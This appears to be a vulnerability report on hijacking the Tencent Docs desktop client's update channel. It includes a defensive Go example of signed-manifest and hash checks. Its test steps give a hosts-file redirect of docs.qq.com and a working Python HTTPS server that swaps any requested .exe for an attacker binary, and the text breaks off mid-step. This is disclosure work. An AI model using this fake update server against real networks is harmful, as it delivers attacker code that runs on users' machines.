1. Detailed description:

Hazard Description:

If an attacker controls a router, can hijack DNS on the LAN, or can insert a malicious proxy, they can hijack the update channel of every Tencent Docs desktop client on that network (or behind that proxy) that is about to update. The test below replaces the update server with a host presenting a self-signed certificate, so the attack relies on the updater neither rejecting that certificate nor verifying a signature on the downloaded package. The impact is severe.

If automatic updates are on by default or the user has selected them, the attacker's executable is downloaded and run with no user interaction (remote code execution, RCE).
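The two checks whose absence makes this hijack possible, shown as an added example (this is not code from the report or from Tencent Docs): the update manifest must verify under a public key pinned in the client, and the downloaded installer must hash to the digest the signed manifest names. The Manifest fields, the Ed25519 signing scheme, the key pair and the installer bytes are all constructed here for illustration; the real format of the update_manual response is not described in the report. TLS certificate validation (which a properly validating client would fail against the self-signed certificate generated in Step 1) is the other missing control, and is not exercised here because it needs a live connection.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Manifest is a hypothetical update descriptor. The real format of the
// update_manual response is not described in the report; only the fields
// the check needs are modelled here.
type Manifest struct {
	Version string `json:"version"`
	Path    string `json:"path"`
	SHA256  string `json:"sha256"` // hex SHA-256 of the installer bytes
}

// VerifyUpdate is the check whose absence the report exploits. It accepts an
// installer only if (1) the manifest verifies under a public key pinned in the
// client binary, and (2) the installer hashes to the digest that signed
// manifest names. Neither step trusts the TLS connection or the server, so a
// hijacked docs.qq.com with a self-signed certificate can deliver bytes but
// cannot get them executed.
func VerifyUpdate(pinnedPub ed25519.PublicKey, manifestJSON, sig, installer []byte) (*Manifest, error) {
	if len(pinnedPub) != ed25519.PublicKeySize {
		return nil, errors.New("pinned key has wrong length")
	}
	// Verify before parsing: untrusted JSON is never fed to the parser.
	if !ed25519.Verify(pinnedPub, manifestJSON, sig) {
		return nil, errors.New("manifest signature invalid")
	}
	var m Manifest
	if err := json.Unmarshal(manifestJSON, &m); err != nil {
		return nil, fmt.Errorf("manifest malformed: %w", err)
	}
	sum := sha256.Sum256(installer)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return nil, errors.New("installer digest does not match signed manifest")
	}
	return &m, nil
}

// Scenario replays the report's attack against VerifyUpdate with keys and
// payloads constructed in-process (no network). It returns whether the
// genuine package, the swapped .exe, and a re-hashed but unsigned manifest
// were accepted.
func Scenario() (genuineOK, swappedOK, forgedOK bool, err error) {
	// Stand-in for the vendor signing key; the public half would ship in the client.
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, false, false, err
	}

	genuine := []byte("MZ... constructed stand-in for the real installer bytes")
	gsum := sha256.Sum256(genuine)
	manifest, _ := json.Marshal(Manifest{
		Version: "constructed",
		Path:    "api/package/desktop_auto_update", // path named in the report
		SHA256:  hex.EncodeToString(gsum[:]),
	})
	sig := ed25519.Sign(priv, manifest)

	// 1. Legitimate update: signed manifest + matching installer.
	_, e1 := VerifyUpdate(pub, manifest, sig, genuine)

	// 2. The report's fake server: replay the signed manifest, swap the .exe for 1.exe.
	fake := []byte("MZ... constructed stand-in for the attacker's 1.exe")
	_, e2 := VerifyUpdate(pub, manifest, sig, fake)

	// 3. Attacker also rewrites the digest in the manifest; without the
	//    private key the old signature no longer verifies.
	fsum := sha256.Sum256(fake)
	forged, _ := json.Marshal(Manifest{
		Version: "constructed",
		Path:    "api/package/desktop_auto_update",
		SHA256:  hex.EncodeToString(fsum[:]),
	})
	_, e3 := VerifyUpdate(pub, forged, sig, fake)

	return e1 == nil, e2 == nil, e3 == nil, nil
}

func main() {
	g, s, f, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine accepted=%v  swapped exe accepted=%v  forged manifest accepted=%v\n", g, s, f)
}
```

Run it with go run; only the genuine package is accepted, while both the swapped 1.exe and the re-hashed manifest are refused. The order matters: the signature is checked before the manifest is parsed, so attacker-controlled JSON never reaches the parser, and the digest is taken from the signed manifest rather than from any header or sidecar file the fake server could also supply.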

Test steps:

Two hosts or virtual machines are required: one acting as the victim user, the other acting as the fake update server.

To keep it simple, the victim's hosts file is edited directly so that the relevant domain name resolves to the fake server's IP address (on a Windows victim the file is C:\Windows\System32\drivers\etc\hosts); on a real network the same effect would come from the router, DNS or proxy position described above:

192.168.146.1 docs.qq.com

At the same time, the fake server runs the Python script from Step 2 (saved as temp.py), which needs root to bind port 443:

python temp.py

✅ Step 1: Prepare the certificate

You will need two files:

cert.pem (self-signed public-key certificate)

key.pem (private key)

You can generate them with openssl (I used Kali):

openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -nodes

✅ Step 2: Python code

import os
import ssl
import mimetypes
from urllib.parse import unquote, urlparse
from http.server import HTTPServer, SimpleHTTPRequestHandler

class FileResponder(SimpleHTTPRequestHandler):
    def do_POST(self):
        self.respond_file()

    def do_GET(self):
        # Any request for a .exe is answered with the attacker's replacement
        # binary (1.exe in the current directory), whatever the real name was
        if self.path.lower().endswith(".exe"):
            file_path = "1.exe"
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(os.path.getsize(file_path)))
            self.end_headers()
            with open(file_path, "rb") as f:
                self.wfile.write(f.read())
            print(f"📤 Served substitute EXE: {file_path}")
            return

        # Everything else (update manifests etc.) is served from disk
        self.respond_file()

    def respond_file(self):
        # Drop the query string and keep only the path component
        parsed_path = urlparse(self.path).path
        path = unquote(parsed_path).lstrip('/')
        # Map the request path onto the current directory, so a request for
        # /api/packageupgrade/update_manual is answered from
        # ./api/packageupgrade/update_manual
        file_path = os.path.join(os.getcwd(), path)

        if os.path.isfile(file_path):
            self.send_response(200)
            ctype = mimetypes.guess_type(file_path)[0] or "application/octet-stream"
            self.send_header("Content-type", ctype)
            self.send_header("Content-Length", str(os.path.getsize(file_path)))
            self.end_headers()

            with open(file_path, "rb") as f:
                self.wfile.write(f.read())
            print(f"📤 Served resource: {file_path}")
        else:
            self.send_error(404, f"File not found: {file_path}")

# HTTPS server on 443 (binding it requires root or CAP_NET_BIND_SERVICE)
server_address = ('0.0.0.0', 443)
httpd = HTTPServer(server_address, FileResponder)

# Wrap the listening socket in TLS using the self-signed certificate from Step 1
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)

print("[+] HTTPS server started on port 443")
httpd.serve_forever()

✅ Step 3: Populate the fake server (the second host or virtual machine)

Store the file the updater requests as api\packageupgrade\update_manual at that relative path under the server's current directory, so that respond_file() finds it (on the Linux fake server the directories are api/packageupgrade/).

Store the api\package\desktop_auto_update